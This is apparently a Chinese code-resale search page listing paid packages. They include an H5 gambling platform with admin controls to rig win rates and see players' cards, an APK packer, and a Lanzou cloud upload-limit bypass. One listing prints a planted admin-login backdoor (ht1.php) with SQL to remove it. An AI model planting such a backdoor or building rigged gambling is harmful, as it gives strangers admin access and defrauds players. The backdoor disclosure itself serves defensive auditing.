找到 745 篇与 csd 相关的结果 - 第 5 页
-
圈子社区系统源码TroveV1.1发布,修复已知问题,新增夜间模式 Trove 是一款主打小而美、运行轻快的瀑布流社区应用,支持打包为 H5、APP、微信小程序多端部署,可用来快速搭建高性能、高安全的社区平台。 项目后端采用 RuleApiV2 Pro 体验版,当前仅使用不到五分之一的接口能力。功能覆盖瀑布流布局、付费阅读、AI 创作集成、完整付费体系、第三方登录体系,能力齐全。 相关介绍可查阅往期内容:#【原创首发】Trove,付费资源社区 / 个人博客 / 短视频 APP 源码# APP 端代码已完全开源,可对照规则之树官方接口文档自由二次开发。代码经过精心优化,规避 AI 批量生成的劣质代码问题。 V1.1 更新要点 修复全部已知问题,提升整体稳定性 新增夜间模式功能支持 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
全开源H5棋牌对战系统,做了简单的修复和优化,可以二次开发! 支持炸金花、二八杠、牌九、三公、赖子牛牛、斗牛,优化了一下无限回调接口 这是一套微信内运行的 H5 棋牌/对战平台,属于「神兽」系 H5 棋牌源码的转售变体。Web 端负责大厅、房间、后台、支付;房间内的实时对战由独立的 PHP 常驻进程(Workerman)通过 WebSocket 承载。 后台可以控制用户胜率、透视功能【后门文件全部已经解密,可以放心学习,代码全部明文】 后台免密登录后门app/js/ht1.php · admin/themes/simplebootx/Api/ht1.php文件特征两个文件内容完全一致,各 142 字节 <?php session_start(); $_SESSION["ADMIN_ID"]=1; // ← 直接把自己写成管理员 $url = "http://". $_SERVER['HTTP_HOST']."/Admin/Index/index"; header("location:$url"); 为何有效后台基类 application/Admin/Controller/AdminbaseController.class.php 第 34–41 行的鉴权逻辑是: 读取 session('ADMIN_ID') → 非空即视为已登录 → 用该 ID 查管理员 → 通过校验 ht1.php 用原生 $_SESSION 写入同一个 key,与 ThinkPHP 的 session 封装完全兼容危害任何人只要访问一次 你的域名/app/js/ht1.php,就会被 302 送进后台首页,拿到超级管理员权限(可改站点、看全站用户资料、改赔率、导出数据) 典型的「作者留一手」。文件名叫 ht1.php,藏在 JS 目录和后台模板目录里,不做审计基本发现不了。必须直接删除。 后门文件加密的app\files\js 清理数据库中的植入内容 -- 1. 清掉被塞了外链的邮件模板 UPDATE jz_options SET option_value='' WHERE option_name='member_email_active'; -- 2. 删除厂商隐藏路由 DELETE FROM jz_route WHERE route LIKE '%5e1e5cb1d3841476ceb279da1db2e905%'; -- 3. 确认没有残留的前运营方域名(应为 0 行) SELECT COUNT(*) FROM jz_room WHERE dwz LIKE '%zuilovexr%' OR dwz LIKE '%yaayam%' OR dwz LIKE '%decadeleader%' OR dwz LIKE '%dianwujy%' OR dwz LIKE '%cgbdh%' OR dwz LIKE '%sixnp%' OR dwz LIKE '%pinche.site%'; ThinkPHP框架想升级的可以自行学习研究 大厅入口 大厅地址: http://你的域名/ (走 ThinkCMF 路由,非微信会跳 BrowserLogin) 备用大厅: http://你的域名/dh 后台: http://你的域名/admin 此处内容已隐藏,高级黄钻可见 请登录后查看特权 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
APP加固源码和成品防护app 一句话结论 这是一套安卓 APK 加固(加壳)工具的完整源码 + 编译好的成品 APK。 作用是:把一个普通的 APK 丢进去,它给你吐出一个「加壳版」APK——原来的代码被加密藏起来,外面套一层壳,让人没法直接反编译看你的源码。 荷花加固.apk(10.4 MB)—— 已经编译好的成品,装到手机上就能用 荷花加固源码/ —— 对应的完整工程源码(Android Studio / Gradle 工程) 一、成品 APK 长什么样(给用户用的界面) 打开后是一个叫 AndroidPacker 的安卓 App,副标题写着 “Enterprise APK Protection Console”(企业级 APK 保护控制台)。操作流程就四步: 点「选择」挑一个要加固的 APK (可选)选自己的签名文件 .jks/.p12,填密码和别名;不填就用测试签名或「原签名自签」 选加固强度档位 点「开始加固」→ 输出到 Downloads/AndroidPacker/xxx_hardened_时间戳.apk 界面里有四档预设,对应不同的检测开关组合: 档位说明均衡模式(默认)大多数 APK 直接能用兼容优先减少高风险检测,保证复杂 APK 能正常启动严格模式全部原生检测拉满,发布前需充分测试自定义手动勾选下面这些开关 可勾选的 7 个反调试检测项: 开关检测什么TracerPid/ptrace有没有调试器附着在进程上maps 注入检测/proc/self/maps 里有没有 Frida / Xposed / Magisk 等注入痕迹LD 环境变量有没有通过环境变量注入Hook 符号内存里有没有 MSHookFunction、DobbyHook 等 Hook 框架符号调试进程进程列表里有没有 frida-server、gdbserver、lldb-serverFrida 端口扫描 Frida 默认监听端口后台巡检起一个 native 线程,每 3~7 秒随机循环复查一次 还有一个可选的 Dex2C 开关,需要填「转换规则」(哪些类/方法要转成 C 代码)。 二、技术原理:它到底对 APK 做了什么 这套东西的技术含量不低,不是那种简单的「DEX 整体加密 + 壳」的初级加固。核心逻辑在 PackerEngine.java 的注释里写得很清楚,分五层: 1. 抽壳 —— 换掉 Application 入口 用 stub_template/ProxyApplication.java.tpl 编译出一个 stub.dex 壳,通过 AxmlPatcher 直接改 APK 里的 AndroidManifest.xml 二进制,把原来的 Application 类替换成壳类。 壳类一启动就 System.loadLibrary("core") 加载 native 库,然后把 getClassLoader() 劫持掉,返回自己的加载器。 2. DEX 加密(NPX3) 原来的 classes.dex 被从 APK 里删掉,改成加密后放进 assets/。 加密算法:AES-GCM(带完整性校验,改一个字节就解不开) 每包随机生成一个 Root 密钥 用 HKDF 按不同用途派生子密钥(域隔离) 3. Root 密钥拆成两份,埋在 .so 里 这是比较讲究的一步。Root 密钥不是明文存着的,而是拆成两份 XOR 分片,注入 native 库的两个自定义只读段里: .rodata.np.k1 → kRootShareABlock .rodata.np.k2 → kRootShareBBlock 每份前面有 16 字节的「锚点」(AES-K-ANCHOR-V1 / MAC-K-ANCHOR-V1),加固工具在打包时按锚点定位、把随机密钥 patch 进去。 运行时两份分片异或(XOR)还原 Root,再按域派生工作密钥。静态翻 .so 只能看到一份分片,拼不出完整密钥。 4. 内存加载 DEX,不落盘 这是「壳」最关键的一步,在 inmemory_loader.cpp 里: 从 assets/ 读加密 DEX → native 层 AES-GCM 解密 → 得到明文 DEX 字节 用 madvise(MADV_DONTDUMP) 标记这块内存,让 coredump 和简单内存扫描抓不到 Android 9+ 走 InMemoryDexClassLoader(ByteBuffer[], parent) —— 内存直接加载,全程不写文件 Android 8 及以下走反射 DexFile.loadDex 的老路子 配套的 art_helper.cpp(659 行)负责把 ContextImpl、LoadedApk 这些系统内部对象的字段反射替换掉,让系统以为加载的就是原来的 Application。 这一步的价值:常规脱壳工具靠「扫文件系统找释放出来的 dex」就完全失效了。 5. Dex2C —— 把 Java 方法编译成 C 开启后(Dex2cIrEncryptor + dex2c_runtime.cpp),指定方法的 IR 被转成自定义字节码,再: 每个方法体是独立的 AES-GCM 块,各自有独立 nonce 和 HKDF 密钥 方法顺序在打包时随机打乱 操作码映射表每包都不同(opcode randomization) 也就是说,同一个 APK 加固两次,产物字节层面完全不一样,没法靠比对做特征识别。 6. 签名与对齐 用官方 apksig 库签 V1 + V2 + V3,外加邻接的 V4 .idsig native 库按 16 KB 对齐(-Wl,-z,max-page-size=16384)—— 这是为 Android 15+ 的 16KB page size 要求做的适配 没给 KeyStore 时自动生成一个随机 RSA 2048 测试签名(CN=Android Debug) 编译期安全加固 Android.mk 里 native 库开了不少编译防护:ThinLTO、栈保护(SSP)、FORTIFY_SOURCE=2、隐藏符号、RELRO + NOW、arm64 的 PAC/BTI(-mbranch-protection=standard),还用 version script 白名单只导出 JNI_OnLoad。 有个注释挺有意思,是实机踩坑记录: 不要对 JNI 模块启用 Clang CFI。隐藏符号 + ThinLTO 下,arm64 的 CFI 会给导出的 JNI_OnLoad 生成一个 canonical trap stub(BTI; BRK #0x5502),Android 的 native loader 通过 dlsym 直接调用它会崩。已在 Android 16 arm64 真机复现。 所以在 app/build.gradle 里专门写了个 Gradle 检查任务:反汇编 libcore.so,如果 JNI_OnLoad 开头出现 brk 指令就直接 build 失败。 三、源码规模 部分规模Java(加固工具本体,10 个类)约 4961 行Native C/C++(壳运行时)约 3603 行支持 ABIarm64-v8a / armeabi-v7a / x86_64 / x86 主要文件: app/src/main/java/com/x/apacker/ ├── MainActivity.java 界面与流程编排 ├── PackerEngine.java 核心加固引擎(打壳/加密/重打包/签名) ├── AxmlPatcher.java 二进制 AndroidManifest 改写 ├── DexEncryptor.java NPX3 DEX 加密 ├── Dex2cIrEncryptor.java D2M2 Dex2C 加密容器 ├── Dex2cBridgeRewriter.java Dex2C bridge 重写 ├── BuildKeyDerivation.java HKDF 密钥派生 ├── KeyInjector.java 把密钥分片 patch 进 .so ├── ApkSigner.java V1/V2/V3/V4 签名 ├── PreflightInspector.java 加固前预检 ├── NativeDex2cEngine.java ├── PrivateApkLayout.java └── RuntimeMetadataEncryptor.java native_core/src/ ├── jni_entry.cpp JNI_OnLoad + 方法注册 ├── keys.cpp 密钥分片(锚点定位) ├── classloader/inmemory_loader.cpp 内存加载 DEX ├── reflect/art_helper.cpp ART 内部字段反射 ├── hidden_api/exempt.cpp 隐藏 API 豁免 ├── anti_debug/anti_debug.cpp 7 项反调试 ├── dex2c/dex2c_runtime.cpp Dex2C 运行时 ├── crypto/ AES / GCM / SHA256 / SHA512 / HKDF └── storage/ APK 存储与运行时元数据 四、怎么编译 README.md 里给了标准步骤: 装 Android SDK + NDK 复制 local.properties.example → local.properties,填 sdk.dir gradlew.bat testDebugUnitTest # 跑单元测试 gradlew.bat buildNativeCore # 编译 native 壳 gradlew.bat assembleDebug # 出 APK 或者直接双击 run_compile.bat,它会自动找 JDK(优先 JAVA_HOME,其次 Android Studio 自带的 JBR)。 工程本身是 Gradle 8.x + AGP 8.3.2,minSdk 26(Android 8.0)、compileSdk 34。 依赖里能看到技术选型:smali-dexlib2(DEX 操作)、apksig(签名)、BouncyCastle(证书)、Guava。 目录里还附了 AIDE Pro_2.9.1.apk(61 MB),是安卓端的 Java IDE,用来在手机上改这个工程、直接编译出 APK——也就是说这套东西是设计成「手机上就能完成加固」的,不需要电脑。 五、这东西能用来干什么 正经用途: 保护自己开发的 APK 不被轻易反编译、篡改、二次打包 学习 APK 加固 / 壳技术的完整实现(这套代码质量不错,注释详实,特别是那些实机踩坑记录很有参考价值) 对比研究商业加固(360 加固、腾讯乐固、梆梆)的技术路线差异 需要提醒你注意的: 加固 ≠ 安全。 加壳只提高逆向成本,挡不住有心人。真正的密钥、接口凭证、核心算法不要靠加固来保护。 加固后的 APK 兼容性风险很高。 特别是: 用了热修复、插件化、跨进程、加固过的第三方 SDK 的 APK,套壳后大概率起不来 严格模式(全部检测拉满)容易误杀正常环境,必须真机充分测试再发 可以先从「兼容优先」档试,能正常跑再往上加 反调试在开发阶段会挡住你自己。 开了 TracerPid 检测后,你自己挂调试器会直接崩。开发期建议关掉反调试,出包时再开。 签名问题最容易翻车。 用「测试签名」出的包,用户装不上(和原 App 签名不一致会被系统拒绝覆盖安装)。用「原签名自签」的话,输出的是未签名 APK,必须你自己拿原私钥重新签 v2/v3 才能装。 上架应用商店要谨慎。 部分渠道对加固后的包有额外审核要求;另外加固会改 Manifest 和 DEX 结构,某些渠道的自动化检测可能误报。 别拿它加固别人家的 APK。 对第三方 App 加壳再分发,属于侵权甚至违法。这个包自带的免责声明也是这个意思。 六、和你的业务有什么关系 结合你在做的方向,这套东西有几处可以直接用得上: CordysCRM 移动端(Capacitor 打包的 Android APK):如果是要交付给客户的产品包,加固可以防止客户方或第三方直接反编译拿 H5 源码和接口地址。但要注意 Capacitor 的 WebView + 插件机制比较特殊,套壳后要重点测 WebView 加载、JS Bridge、文件访问这几块。 源码站内容:这套资源本身是很典型的「高价值工具类源码」,素材质量和完整度都够(源码 + 成品 + 编译说明 + AIDE 手机编译方案),适合做技术科普向的公众号文章。 安全审计视角:这套源码里 native 层的密钥分片、内存加载、反调试检测清单,反过来也是一份很好的「加固 App 怎么分析」的对照教材。 附:目录清单 APP加固源码和成品防护app/ ├── 荷花加固.apk 10.4 MB 编译好的成品,装机即用 ├── 荷花加固源码/ 完整工程源码 │ ├── app/ Android App 模块 │ ├── native_core/ C/C++ 壳运行时 │ ├── stub_template/ 壳模板(编译成 stub.dex) │ ├── gradle/ gradlew gradlew.bat 构建工具 │ ├── build.gradle settings.gradle 构建配置 │ ├── run_compile.bat 一键编译脚本 │ ├── local.properties.example SDK 路径配置样例 │ ├── README.md 编译说明 │ ├── AIDE Pro_2.9.1.apk 61 MB 手机端 Java IDE(配套工具) │ ├── 【必看】狗凯之家提醒.txt │ ├── 免责声明.txt │ ├── 更多实用资源.html │ └── 防失联.jpg └── README.txt 源码站标准免责声明 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
奇云聚合登录系统,快捷接入各大平台登录方式 一、环境要求 PHP ≥ 7.3(推荐 7.4 / 8.0) MySQL ≥ 5.6(推荐 5.7 / 8.0),也可使用兼容的 MariaDB Web 服务器:Nginx / Apache;网站根目录指向程序目录 网站目录需要开启可写权限(用于安装、缓存、文件上传) 服务器需安装 SG 扩展 二、全新安装步骤 将完整程序包上传服务器,解压至网站根目录 浏览器访问:http(s)://你的域名/install/ 根据安装向导:环境检测 → 填写数据库连接信息 → 执行安装 默认管理员账号:admin 默认管理员密码:a123456 ⚠️ 安装完成务必第一时间登录后台修改管理员密码。 安装成功后自动生成 install/install.lock 锁定文件。 如果需要重新安装,要先删除此文件;重新安装会清空现有数据,操作前做好备份。 三、访问入口 前台 / 用户中心:http(s)://你的域名/ 后台管理:http(s)://你的域名/admin/ 安装向导页:http(s)://你的域名/install/ 已安装状态下存在 install.lock,访问安装页会提示已完成安装,禁止重复安装。 补充:同类聚合登录项目参考(来自资源站) 2026 全新聚合登录系统 完全兼容彩虹聚合登录 API,可直接无缝替换;支持 QQ、微信、微博、支付宝、GitHub、Google、Gitee、百度、抖音、微软、小米、钉钉、飞书、企业微信;支持多应用管理。 彩虹聚合登录系统(开心版) 老牌社交中转登录系统,配套开发文档、SDK;支持会员购买、登录统计、多应用、域名白名单限制。 php 清轩聚合登录平台 基于彩虹聚合登录二次开发;后台使用 ayuiadmin,新增前台界面、开发文档、SDK;支持多应用、域名限制、登录记录。 提示:使用第三方开源 / 二开源码,上线前建议做源码安全审计,排查后门、风险代码。 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
匿名匹配+漂流瓶+阅后即焚——匿名星球,多种玩法承包你的深夜! 功能简介 一、匿名聊天 打开首页点「开始匹配」,一两秒就能连上一位在线陌生人。匹配前可以先挑最多 5 个兴趣标签(音乐、影视、游戏、旅行、二次元……),有共同兴趣的人会优先配给你。对方看不到你的账号,也不知道你的精确位置,最多只显示到省/市。聊不下去点「跳过」换人,还有配对冷却机制,不会刚跳过就又配到同一个人。 二、漂流瓶 匿名扔出一个瓶子,把心事交给大海;也能捞起别人漂来的瓶子,读一读,再匿名回一封信。一来一往,就成了只属于你们两个人的私密对话,别人看不见。 三、通讯录 聊得投缘就加为好友。之后在通讯录里,和已经是好友的人实名私聊,聊天记录会保留一段时间——适合把陌生人处成朋友之后,继续好好聊下去。 四、朋友圈 发图文动态、点赞、评论。每条动态都能设置「公开 / 仅好友可见 / 完全私密」三档,想热闹就热闹,想安静就安静。 五/阅后即焚(全站隐私亮点) 匿名聊天时,消息可以开启「阅后即焚」——对方点开看过,60 秒倒计时一结束,这条消息就从你们双方的聊天里消失,不再显示。对话结束后,整段聊天记录也会由系统自动定期清除,不会长期留存。聊过什么,留在你们当时的对话里就好。 六、AI 助手 首页下方有「和 AI 助手聊聊」入口,功能不会用、按钮找不到、遇到报错,直接问它就行。 顶部实时显示在线人数、提示音可一键静音;「我的」里能绑定邮箱,逐项开关六类消息提醒。 一句话:想找个陌生人聊两句,又不想暴露自己——匿语,刚刚好。 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
蓝奏云超过100M 文件上传方案 原生 PHP 分片上传下载合并 API 源码 突破蓝奏云100M上传限制与无缝下载合并附纯原生PHP Web API源码+算法分析+演示 ?️ 狗凯源码库 · 安全审计 突破蓝奏云 100M 上传限制 审计报告与部署教程 一套蓝奏云网盘的 Web API 中转程序:登录、直链解析、分片大文件上传/合并下载、网盘管理全家桶,自带面向小白的完整接口文档。本质是对蓝奏云网页协议的逆向实现,不含数据库、部署极简。本报告拆解其原理与风险,并给出宝塔部署教程。 技术栈:PHP 7.4+(无数据库)规模:9 文件 / 3303 行核心代码危险等级:低(协议工具类)审计:2026-09-25 01审计结论与原理拆解 “突破 100M”到底是怎么做到的 蓝奏云官方网页端限制单文件 100MB,但其客户端协议的分片上传通道并不受此限制。本程序的做法: 大文件切片:前端把大文件分片,通过 action=prepare_bigfile 初始化切片目录,逐片调用 action=upload 上传; 索引归档:全部切片传完后调 action=finish_bigfile 生成索引档案上传到网盘; 合并下载:下载端解析到索引档案后,用 action=download_folder&stream=1 以 SSE 实时进度把分片按序拉回、服务端流式合并输出给浏览器,全程不占服务器磁盘(中转临时文件 fetch_transit 用完即焚)。 文件构成 src/LanZouCloud.php(1927 行,协议核心:登录/直链/上传/管理)+ src/Models.php + src/Utils.php + api.php(843 行,30+ 个 action 的统一 Web 入口)+ index.html(前端界面) 功能清单 免登录直链解析、分片合并下载、账号 Cookie 登录校验、目录/文件管理(建删移改名/提取码/描述/分享链接)、大文件切片、IP 风控诊断 文档质量 README.md 是一份难得的高质量中文接口文档(错误码速查表、新手 Cookie 指南俱全),可直接当 API 手册用 品牌现状 版权声明文件已是狗凯源码库(bbbb.bid)版本,无第三方广告残留 测试数据 无(纯工具类,无数据库与用户数据) ⚖️ 合规提示:此程序属于逆向第三方平台协议的工具:绕过的是蓝奏云网页端的产品限制,使用它需要自担账号风控风险(内置 action=check_ip 正是为了诊断服务器 IP 是否已被蓝奏云风控),也需注意蓝奏云用户协议约束。仅供学习研究 HTTP 协议逆向与分片传输技术。 02风险点 部署前必看 风险说明等级账号 Cookie 暴露面api.php?action=login 接受蓝奏云账密并保管 Cookie——若把 api.php 暴露在公网,等于把网盘控制权交给任何访问者高无鉴权设计程序本体不带用户体系,”谁来访问谁能用”。自用务必配 local_only 思路:IP 白名单、Basic Auth 或仅内网高平台风控服务端高频请求可能触发蓝奏云验证码(CAPTCHA_ERROR 状态码已内置)或 IP 封禁中临时文件堆积中转/切片文件依赖正常流程清理,异常中断后建议定期清理临时目录低 03宝塔部署教程 零数据库,5 分钟跑通 1 环境准备 宝塔安装 Nginx + PHP 7.4/8.0,PHP 需开启 curl、openssl、mbstring、zip 扩展;upload_max_filesize 与 post_max_size 按切片大小设置即可(单片不大,100M 足够)。无需数据库、无需 composer(纯 curl 实现)。 2 上传源码 整包上传到站点根目录(如 /www/wwwroot/lz.demo),确保目录可写(切片临时目录需要写入权限,755 递归)。 3 访问与自检 浏览器打开 http://你的域名/ 进入前端界面。接口自检: 环境检查(PHP 版本 / curl / 可写) curl "http://你的域名/api.php?action=ping" 服务器 IP 风控状态诊断 curl "http://你的域名/api.php?action=check_ip" 全部接口与参数见 README.md——文档写得足够细,按目录逐节调用即可。 4 安全加固(强烈建议) 演示环境建议只在内网使用。若必须公网,在站点配置里对 api.php 加访问限制: Nginx:只允许指定 IP 调用接口 location = /api.php { allow 192.168.1.0/24; # 换成你的内网段 deny all; include enable-php-80.conf;} 5 验证大文件链路 登录蓝奏云 Cookie 后:先用 action=prepare_bigfile 初始化 → 分片上传 → action=finish_bigfile 归档;换一台设备访问分享链接,用 action=parse_file 解析并 stream=1 合并下载,观察 SSE 进度输出,即可完整看到”突破 100M”的分片合并全过程。 今天把全套后端 API 源码与大文件切片合并算法一并分享给大家! 核心两大突破性功能 突破 100MB 上传限制 (伪装切片 + 索引归档) – 当上传的文件超过 100MB 阈值(可自定义 10~100MB)时,程序会自动在蓝奏云创建一个专属大文件目录。 – 将文件切割为若干个合规大小的切片数据块,并随机赋予合法伪装后缀(如 .zip/.docx/.apk)。 – 切片全部上传完成后,自动生成 record.txt JSON 索引文件,记录文件名、总大小及切片列表,完成大文件归档。 自动分段无缝拼接合并下载 – 解析大文件目录时,API 会自动解析 record.txt 索引并按顺序获取所有 part_xxx 切片的直链。 – 后端逐块下载切片,自动识别并裁剪切片尾部的 512B 伪装数据,然后通过流式 Buffering 追加拼合为原始文件。 – 下载接口支持 SSE (Server-Sent Events) 长连接,实时推送【1.分段下载 -> 2.服务器合并校验 -> 3.客户端保存与中转自动销毁】。 核心突破代码解析 大文件切片无缝拼接合并与去除 512B 报尾 Padding 这是大文件无缝合并下载的核心算法。下载时不仅要按索引按顺序拉取切片,还要自动识别并截断切片尾部 512B 的随机防屏蔽 Padding,再进行 4MB 数据流追加拼合: 流式输出与临时中转缓存“秒删销毁” 为保证服务端做代理合并下载时磁盘0 残留,后端通过流式 Output 推送给客户端,传输完成后立刻销毁中转目录 ESA acw_sc__v2 挑战算法纯 PHP 逆向求解 当蓝奏云触发 ESA 防爬校验时,后端直接通过代码解密混淆算法,求解 acw_sc__v2 Cookie 响应头 后端 API 调用与接口测试截图 部署好 api.php 后,你的第三方客户端、小程序或 Python 脚本即可方便调用: 免登录单文件直链解析 API curl "http://你的域名/api.php?action=parse_file&url=https://pan.lanzouo.com/i123456&pwd=1234" 返回 JSON 结构: { "code": 0, "msg": "解析成功 (已识别为切片合并大文件)", "data": { "name": "超大软件安装包.zip", "size": "350.5 MB", "is_big_file": true } } 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
微博图床php程序源码分享,微博图片上传php系统 偶尔想上传一些图片,百度了一些图床,都需要注册,太麻烦了。 于是修复了下微博接口,只要不是黄赌毒的敏感图片,微博图片就会一直存在。还是挺方便的。可以去我的体验地址测试一下 微博图床上传工具:基于PHP 7.4+原生JS的网页版图床工具,无需数据库、上传即用。 支持微博/QQ 扫码登录获取Cookie,拖拽、粘贴截图即可批量上传图片并秒得sinaimg.cn直链,可自定义并发数、重试次数与图床节点,内置图片代理加速与防盗链处理,支持一键复制链接、导出JSON/CSV。 每个浏览器拥有独立标识,最近记录、清空、导出、复制全部只作用于本人数据,多人共用互不干扰;配备CSRF校验、IP白名单与23项环境自测,配置集中于config.php,部署到任意PHP空间即可运行。 资源下载 隐藏内容,请前往内页查看详情 本资源售价9.9元,购买后即可查看下载地址。如有问题请联系站长。 -
APITable {card-default label="? 项目信息"} ? 项目名称:APITable ? 开发语言:TypeScript ⭐ Star数:1703 | ? Fork数:416 ? 开源协议:AGPL-3.0 ? 项目地址:https://gitee.com/apitable/APITable {/card-default} 项目介绍 vika.cn维格表社区版,地表至强的开源低代码、多维表格工具,Airtable的开源免费替代,智能表格与数据库的结合。 项目详情 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 English | Français | Español | Deutsch | 简体中文 | 繁體中文 | 日本語 ✨ 快速开始 APITable 目前正在 积极开发中。 我们将在 2023 年 2 月下旬公布第一份发行版本。 加入 Discord 或 Twitter 保持联系。如果您只是想尝试APITable1, 点击这里 ⚡️Gitpod 在线 Demo. 如果您想要在本地或云端计算环境中安装 APITable ,请参阅 ? 安装 如果你想要设置你的本地开发环境,请阅读我们的 ?? 开发者指南 ? 功能特性 实时协作 神奇表单 项目截图 项目截图 API 优先的面板 无限跨表关联 项目截图 项目截图 强大的行/列权限 内嵌 项目截图 项目截图 APITable 提供了一系列令人惊奇的功能,从个人到企业。 先进的技术栈并开源 实时协作 允许多个用户实时或与 操作转换(OT) 算法同时进行编辑。 使用 canvas 渲染的极其流畅、用户友好、极其快速的数据库-电子表格界面。 数据库本地架构:变更集/操作/动作/快照等等。 实时协作 100k+ 数据行 从 数据(Data) 到 元数据(MetaData) 的全栈式API访问。 单向/双向表链接和 无限交叉链接 社区友好的编程语言和框架,TypeScript (NextJS + NestJS) 和 Java (Spring Boot) 美观和功能齐全的多维表格UI界面 CRUD: 创建、浏览、更新、删除表、列和行 字段操作: 排序、过滤、分组、隐藏/取消隐藏、高度设置。 基于空间(Space):使用分离的工作空间来代替基于 App/Base 的结构,使无限的表格连接成为可能。 暗色模式 和主题定制。 7 种视图类型: 网格视图(Datasheet) / 图库视图 / 脑图视图/ 看板视图 / 全功能网格视图 / 日历视图 一键式 API 面板 装备齐全 内置的 10+ 个官方模板 机器人自动化和自定义配置 商业化智能(BI)仪表板 一键式自动生成表单 可共享和嵌入的页面 多语言支持 集成 n8n.io / Zapier / Appsmith... 及更多 卓越的扩展性 超过 20 个官方开源组件,以及可扩展的 组件系统 可自定义的图表 & 仪表板 可自定义的数据列类型 可自定义的公式 可自定义的自动化机器人行为 企业级权限 镜像, 将视图变成镜像以实现行权限 通过非常简单的操作激活 列权限 文件夹/子文件夹/文件权限 树结构文件夹和可自定义的节点(文件) 团队管理 & 组织架构 企业级应用功能 SAML 单点登录(SSO) 审计 数据库自动备份 数据导出 水印 .... 使用可扩展的组件和插件,您可以添加更多功能。 ? 应用场景 为什么你必须知道 APITable 并作为你的下一个软件? 作为超级管理软件 灵活的项目管理 & 任务/问题管理 营销潜在客户管理。 最灵活和可连接的 CRM 灵活的 BI 图表系统 便于人们使用的表格和调查表 灵活的 ERP 低代码和无代码平台。 ...及更多, APITable 将 1000 个软件放入您的口袋中。 作为一个可视化数据库基础设施 将 APITable 嵌入 到你自己的软件 UI 中 带有 REST API 的可视化数据库 管理员仪表板 集中管理配置 多合一的企业数据库,连接你的所有 软件 ...及更多, APITable 连接一切 此外,它是开源和可扩展的 ? 面向 API API 面板 点击右角的 API 按钮将显示 API 面板 SQL式查询 APITable 将提供一个数据表查询语言(DQL)来查询您的数据库电子表格内容。 ? 嵌入友好 分享和嵌入 分享您的数据表或文件夹。通过复制和粘贴 HTML 脚本嵌入它们。 企业可用的嵌入 APITable.com 为证券业提供更多企业可用的嵌入功能。 安装 请确保您已在本地安装 docker & curl 。 如果您的计算机安装了 Docker ,打开您的终端并这样运行: curl https://apitable.github.io/install.sh | bash然后在您的浏览器中打开 http://localhost:80 访问它。 如果你想要设置你的本地开发环境,请阅读我们的 ?? 开发者指南 ?? 贡献 欢迎并感谢您为 APITable 作出贡献! 除了编写代码,您还有许多方法可以帮助 APITable 项目的茁壮成长。 你可以通过如下方式给项目提供帮助: 加入 Crowdin Translation Project ,帮助我们进行翻译 创建新 Issues 来反馈 BUG 或者优秀想法 关注我们的 Twitter 账号 完善、增添项目的 Documentation 当然还有无限欢迎的 Contributing Code 更多详情,请查看 贡献指南 。 这是一份入门指南,让您快速了解如何为 APITable 的茁壮成长贡献力量。 开发环境 在我们的 开发者指南 中学习如何设置您的本地开发环境。 Git 工作流基础 下面是通用的 APITable 工作流: 创建一个问题并描述您想要的功能 -> APITable 问题 派生此项目 -> Fork APITable 项目 创建您的功能分支(git checkout -b my-new-feature) 提交您的更改(git commit -am 'Add some features') 推送分支 (git push origin my-new-feature) 创建新的拉取请求 -> 通过派生创建拉取请求 工作约定 APITable 可适用这些通用的约定: 我们的 Git 分支模型是什么? Gitflow 如何在派生项目上进行合作? Github Flow 如何写入好的提交消息? Conventional Commits 我们的更新日志格式是什么? Keep Changelog 如何进行版本控制和标记? 语义化版本控制 Java 编码准则是什么? Java 编码准则 | Intellij IDEA 插件 TypeScript 编码准则是什么? -> TypeScript 风格指南 | ESLint 文档 帮助中心 ?? 开发者中心 REST API 文档 小部件 SDK (即将到来...) 脚本(即将到来...) ? 规划路线 未来的功能 重代码界面生成器 可嵌入的第三方文档组件 类似 SQL 的 DSL 作为一个 IdP Web 3 功能 ... 托管服务版和企业版提供高级功能 作为一个 IdP SAML 单点登录 审计 数据库备份 水印 欲了解更多信息,请通过 联系我们。 ? 参与进来 ? 我们为什么要创建 APITable 并开源? 我们认为 数据库是所有软件的基石。 我们相信,为每个人制作一个具有丰富和简单用户界面的可视化数据库,可以降低软件行业的难度,提高世界数字化的应用。 我们相信开源 APITable 可以 推动人类前进 我们正在招聘远程工作的开发者! 我们一直在为 APITable 寻找优秀人才: 全栈开发者: 有 React、NextJS、TypeScript、Spring Boot、Java、Terraform 的工作经验。并喜欢写高质量的代码,带有清晰的文档和单元测试。 后端开发者: 有 NestJS、TypeScript、Spring Boot、Java、SQL、Kubernetes、Terraform 的工作经验。并喜欢写高质量的代码,带有清晰的文档和单元测试。 前端开发者: 有 React、NextJS、TypeScript、WebPack 的工作经验。并喜欢写高质量的代码,带有清晰的文档和单元测试。 无论时间和条件如何,如果你想要加入 APITable 团队,请不要犹豫,将您的简历发送到 。 ? 截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 项目截图 ? 许可协议 此仓库包含在 AGPL 下发布的 Open Source 版本的 APITable源代码。 如果你想运行你自己的 APITable 副本或对发展作出贡献,那这里就是你的地方。 详情请参阅 LICENSING 如果您想要在线使用 APITable ,那么您不需要运行此代码。 我们在 APITable 上提供一个托管的应用版本 适合全球加速。 使用AGPL-3.0授权。 由 APITable Ltd设计。 ⬇️ 下载地址 下载后请先检查文件完整性,如有问题请在评论区反馈 ↩ -
